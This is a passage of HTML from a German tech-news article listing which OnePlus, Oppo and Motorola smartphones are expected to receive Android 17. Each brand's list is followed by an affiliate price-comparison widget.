data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">OnePlus</p></div>



<p>Der chinesische Hersteller OnePlus gibt für die meisten seiner Geräte recht eindeutige Update-Versprechen. Ältere Modelle fallen dennoch aus dem Update-Zyklus.</p>



<p>Diese Oneplus-Smartphones sollten auch Android 17 bekommen:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/2972780/oneplus-15-test-handy-flaggschiff.html" target="_blank" rel="noreferrer noopener">OnePlus 15</a></li>



<li><a href="https://www.pcwelt.de/article/3033893/oneplus-15r-test.html" target="_blank" rel="noreferrer noopener">OnePlus 15R</a></li>



<li><a href="https://www.pcwelt.de/article/2582777/oneplus-13-test-smartphone-unter-1000-euro.html" target="_blank" rel="noreferrer noopener">OnePlus 13</a></li>



<li><a href="https://www.pcwelt.de/article/2581125/oneplus-13r-im-test-grossartiger-allrounder-mit-toller-leistung.html" target="_blank" rel="noreferrer noopener">OnePlus 13R</a></li>



<li><a href="https://www.pcwelt.de/article/2218966/oneplus-12-test.html" target="_blank" rel="noreferrer noopener">Oneplus 12</a></li>



<li><a href="https://www.pcwelt.de/article/2231965/oneplus-12r-test.html" target="_blank" rel="noreferrer noopener">Oneplus 12R</a></li>



<li><a href="https://www.pcwelt.de/article/1812962/oneplus-11-test-smartphone.html" target="_blank" rel="noreferrer noopener">Oneplus 11 5G</a></li>



<li>Oneplus Open</li>



<li><a href="https://www.pcwelt.de/article/2852837/oneplus-nord-ce-5-test.html" target="_blank" rel="noreferrer noopener">OnePlus Nord CE5</a></li>



<li><a href="https://www.pcwelt.de/article/2847544/oneplus-nord-5-test-2.html" target="_blank" rel="noreferrer noopener">Oneplus Nord 5</a></li>



<li>Oneplus Nord CE4</li>



<li><a href="https://www.pcwelt.de/article/2420699/oneplus-nord-4-test.html" target="_blank" rel="noreferrer noopener">Oneplus Nord 4</a></li>
</ul>



<p><br><strong>Voraussichtlich kein Android 17:</strong> OnePlus 10 Pro, 10T, 10R, Nord 3 5G, Nord CE 3 Lite 5G, Nord CE4 Lite 5G.</p>



<p><strong>OnePlus 15 im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>785,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Fl4lLy85ZaKXVSmyu4TSBOJIer0pWn6UOyTCPCrRqn_-Kd4oOLB2U9QbcD9aZqXRlKfpa4qJRMyOscaqQuGlAbN4jlV8XjM4WLJy4KUK9witirrdMBgfg8QxsAUILxBhSfQC3B40ZTv&amp;mid=685729038981&amp;id=685729038981&amp;ts=20260621&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Fl4lLy85ZaKXVSmyu4TSBOJIer0pWn6UOyTCPCrRqn_-Kd4oOLB2U9QbcD9aZqXRlKfpa4qJRMyOscaqQuGlAbN4jlV8XjM4WLJy4KUK9witirrdMBgfg8QxsAUILxBhSfQC3B40ZTv&amp;mid=685729038981&amp;id=685729038981&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="785,99 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 785,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>799,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=x1bxm_3VvDlXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyOscaqQuGlAYd5CuUrGlfkePF7nAYeFWZpUfGMZXTif6CpxUJk2naUUyWbwcakYeT&amp;mid=685723675830&amp;id=685723675830&amp;ts=20260621&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=x1bxm_3VvDlXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyOscaqQuGlAYd5CuUrGlfkePF7nAYeFWZpUfGMZXTif6CpxUJk2naUUyWbwcakYeT&amp;mid=685723675830&amp;id=685723675830&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="799,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 799,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/9999.png" alt="Amazon Marketplace CE" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>803,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Jxmde9vm4X2vsU1Wdh-mdc5Hd99OQeF7W5f-Ushe6YPEbEokfk-c7Df3Fm5WBhqPIp5eUIvJnUomB-cUXbVThKUzeZtSXb6XeZzuaQJ9YrVV6p6WpVLxX0yCqnxT5Vlcnd1XjjLGxQT&amp;mid=686419020389&amp;id=686419020389&amp;ts=20260621&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Jxmde9vm4X2vsU1Wdh-mdc5Hd99OQeF7W5f-Ushe6YPEbEokfk-c7Df3Fm5WBhqPIp5eUIvJnUomB-cUXbVThKUzeZtSXb6XeZzuaQJ9YrVV6p6WpVLxX0yCqnxT5Vlcnd1XjjLGxQT&amp;mid=686419020389&amp;id=686419020389&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="803,90 €" data-vars-product-vendor="Amazon Marketplace CE" aria-label="Deal anschauen bei Amazon Marketplace CE für 803,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>849,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ZAxXLF7BZ8f7aDQSDOyE6VW8XdEOWSRxq5LL3gM66IMdozeyQB1s3_NYWZJZdx_K69FiNidwqVqeog659UJ2w6xxqpC4aUBs3iOVXxeMzhYsnLgpQr3CKlSEx970DG4SCMIMJod4ad&amp;mid=686311368892&amp;id=686311368892&amp;ts=20260621&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ZAxXLF7BZ8f7aDQSDOyE6VW8XdEOWSRxq5LL3gM66IMdozeyQB1s3_NYWZJZdx_K69FiNidwqVqeog659UJ2w6xxqpC4aUBs3iOVXxeMzhYsnLgpQr3CKlSEx970DG4SCMIMJod4ad&amp;mid=686311368892&amp;id=686311368892&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="849,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 849,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/oneplus-logo.svg" alt="OnePlus" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>949,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://clk.tradedoubler.com/click?p=321001&amp;a=1573066&amp;epi=rss&amp;url=https://www.oneplus.com/de/oneplus-15" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://clk.tradedoubler.com/click?p=321001&amp;a=1573066&amp;epi=rss&amp;url=https://www.oneplus.com/de/oneplus-15" data-vars-product-price="949,00 €" data-vars-product-vendor="OnePlus" aria-label="Deal anschauen bei OnePlus für 949,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Oppo</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378ef9e9a5e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/PXL_20260222_112411266.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Oppo Find X9 Pro" class="wp-image-3067642" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Bei Oppo stehen die Chancen für die meisten, neueren Smartphones ebenfalls gut, das Update auf Android 17 zu erhalten. Ältere Reno- oder Find-Modelle fallen aber schon bald aus dem Support heraus und sind daher nicht mehr dabei.</p>



<p>Diese Oppo-Smartphones bekommen voraussichtlich Android 17:</p>



<ul class="wp-block-list">
<li>Find N6</li>



<li><a href="https://www.pcwelt.de/article/2967222/oppo-find-x9-pro-test.html" target="_blank" rel="noreferrer noopener">Find X9</a> / Pro</li>



<li><a href="https://www.pcwelt.de/article/2875375/oppo-a5-5g-test.html" target="_blank" rel="noreferrer noopener">A5 5G</a> / <a href="https://www.pcwelt.de/article/2874342/oppo-a5-pro-5g-test.html" target="_blank" rel="noreferrer noopener">5G Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2882216/oppo-a40-test.html" target="_blank" rel="noreferrer noopener">A40</a></li>



<li>Reno 15 / Pro</li>



<li>Reno 14 / Pro</li>



<li>Reno 13 / Pro / F / FS</li>



<li>Find X8 /<a href="https://www.pcwelt.de/article/2546364/oppo-find-x8-pro-test.html" target="_blank" rel="noreferrer noopener"> Pro</a> / Ultra</li>



<li>Find X7 / Ultra</li>



<li>Find N5 </li>
</ul>



<p><strong>Wahrscheinlich kein Android 17:</strong> Find X6, Find X6 Pro, Find X5, Find X5 Lite, Find X5 Pro, Find N2, Find N2 Flip, Reno 12, Reno 12 Pro, Reno 12 F, Reno 12 FS, Reno 11, Reno 11 Pro, Reno 11 F, Reno 11 FS.</p>



<p><strong>Oppo Find X9 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.149,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=NgZUCdtq9yKRDMrEUYsO-lVt6WZAp33cZVVrknm2NO91g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt7qIgcPRIYY5X-0OOTvOfkgc8dTa8CpEu0KHgASXwPOBM5fY0DfQDA&amp;mid=685718919073&amp;id=685718919073&amp;ts=20260621&amp;log=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=NgZUCdtq9yKRDMrEUYsO-lVt6WZAp33cZVVrknm2NO91g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt7qIgcPRIYY5X-0OOTvOfkgc8dTa8CpEu0KHgASXwPOBM5fY0DfQDA&amp;mid=685718919073&amp;id=685718919073&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.149,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.149,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0FVX2B3K4?tag=pcwelt.de-21&amp;ascsubtag=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0FVX2B3K4?tag=pcwelt.de-21&amp;ascsubtag=rss" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Galaxus</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://clkde.tradedoubler.com/click?p=302027&amp;a=1573066&amp;g=24721470&amp;epi=rss&amp;url=https://www.galaxus.de/de/s1/product/oppo-find-x9-pro-512-gb-charcoal-titanium-678-dual-sim-5g-smartphone-64659612" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://clkde.tradedoubler.com/click?p=302027&amp;a=1573066&amp;g=24721470&amp;epi=rss&amp;url=https://www.galaxus.de/de/s1/product/oppo-find-x9-pro-512-gb-charcoal-titanium-678-dual-sim-5g-smartphone-64659612" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Galaxus" aria-label="Deal anschauen bei Galaxus für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=J95VTz7FRaCRDMrEUYsO-lVt6WZAp33caePUA46xw5U1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlHg11Fq30E9rY8ixeJjpfhM0s_4gYjf7vaU99UMVAo-fFcCRJ0K_0r8heIMguSTZ4&amp;mid=685873240083&amp;id=685873240083&amp;ts=20260621&amp;log=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=J95VTz7FRaCRDMrEUYsO-lVt6WZAp33caePUA46xw5U1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlHg11Fq30E9rY8ixeJjpfhM0s_4gYjf7vaU99UMVAo-fFcCRJ0K_0r8heIMguSTZ4&amp;mid=685873240083&amp;id=685873240083&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Motorola</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378ef9f0a2f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/PXL_20260217_075728904.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Motorola Signature gränssnitt" class="wp-image-3062983" width="1200" height="841" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Motorola ist ein etwas schwieriger Fall. Denn obwohl alle Hersteller gleichermaßen von der EU-Regelung betroffen sind, mindestens fünf Jahre Updates zu liefern, meinte das Unternehmen lange Zeit, ein “Schlupfloch” in dieser Aussage gefunden zu haben. Daher verspricht es für einige Geräte nur vier Android-Updates.</p>



<p>Ob sich das bewahrheitet, wird sich erst noch zeigen müssen. Diese Motorola-Smartphones bekommen aber mit großer Wahrscheinlichkeit Android 17:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3068644/motorola-signature-test.html" target="_blank" rel="noreferrer noopener">Signature</a></li>



<li><a href="https://www.pcwelt.de/article/2986379/motorola-edge-70-test.html" target="_blank" rel="noreferrer noopener">Edge 70</a></li>



<li><a href="https://www.pcwelt.de/article/2839163/motorola-edge-60-test-2.html" target="_blank" rel="noreferrer noopener">Edge 60</a> / Ultra / <a href="https://www.pcwelt.de/article/2824306/motorola-edge-60-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3042698/motorola-edge-60-fusion-test.html" target="_blank" rel="noreferrer noopener">Fusion </a>/ Neo</li>



<li>Edge 50 / <a href="https://www.pcwelt.de/article/2367963/motorola-edge-50-ultra-smartphone-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / <a href="https://www.pcwelt.de/article/2332502/motorola-edge-50-pro-test-2.html" target="_blank" rel="noreferrer noopener">Pro</a> / Fusion / Neo</li>



<li>Razr 60 / <a href="https://www.pcwelt.de/article/2764578/motorola-razr-60-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2447520/motorola-razr-50-im-test-faltbares-smartphone-zum-erschwinglichen-preis.html" target="_blank" rel="noreferrer noopener">Razr 50</a> / <a href="https://www.pcwelt.de/article/2603789/motorola-razr-50-ultra-smartphone-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / Neo</li>



<li>Moto G56</li>



<li><a href="https://www.pcwelt.de/article/2572797/motorola-moto-g75-test-2.html" target="_blank" rel="noreferrer noopener">Moto G75</a></li>



<li>Moto G86</li>



<li>Moto G86 Power</li>



<li>Lenovo Thinkphone 25</li>
</ul>



<p><strong>Eher kein Android 17:</strong> Edge 40, Edge 40 Pro, Edge 40 Neo, Razr 40, Razr 40 Ultra, Razr 40 Neo, Moto G35, Moto G45, Moto G55, Moto G85, Lenovo Thinkphone.</p>



<p><strong>Motorola Edge 70 im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>379,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=mQXz358ILJbgFdiMIpCMzOLmod-rlVfsUbN7aF8bFrTHe66dKLCcTskzmk7s2ctphqUtowA_vsBCz4pjixzOwRCDZyrMD_o6rFbwg9h-X_KwCzMYlQWPHBOzUf3LqnIN5vtgtJls728&amp;mid=686333000777&amp;id=686333000777&amp;ts=20260621&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=mQXz358ILJbgFdiMIpCMzOLmod-rlVfsUbN7aF8bFrTHe66dKLCcTskzmk7s2ctphqUtowA_vsBCz4pjixzOwRCDZyrMD_o6rFbwg9h-X_KwCzMYlQWPHBOzUf3LqnIN5vtgtJls728&amp;mid=686333000777&amp;id=686333000777&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="379,99 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 379,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>425,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=k8MDlc9ozGBf7aDQSDOyE7aMvIv8lWwxRq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M0yOXurDQB5-e7Yc94N3eA3RE3AlDIbL1NuHzQcyMFAXuxXeJfAahi4vdiSk8XrPdYiPnqt4q8gN&amp;mid=685779806761&amp;id=685779806761&amp;ts=20260621&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=k8MDlc9ozGBf7aDQSDOyE7aMvIv8lWwxRq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M0yOXurDQB5-e7Yc94N3eA3RE3AlDIbL1NuHzQcyMFAXuxXeJfAahi4vdiSk8XrPdYiPnqt4q8gN&amp;mid=685779806761&amp;id=685779806761&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="425,00 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 425,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/12137.png" alt="Boomstore" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>483,00 €</span>						</div>
						<div>
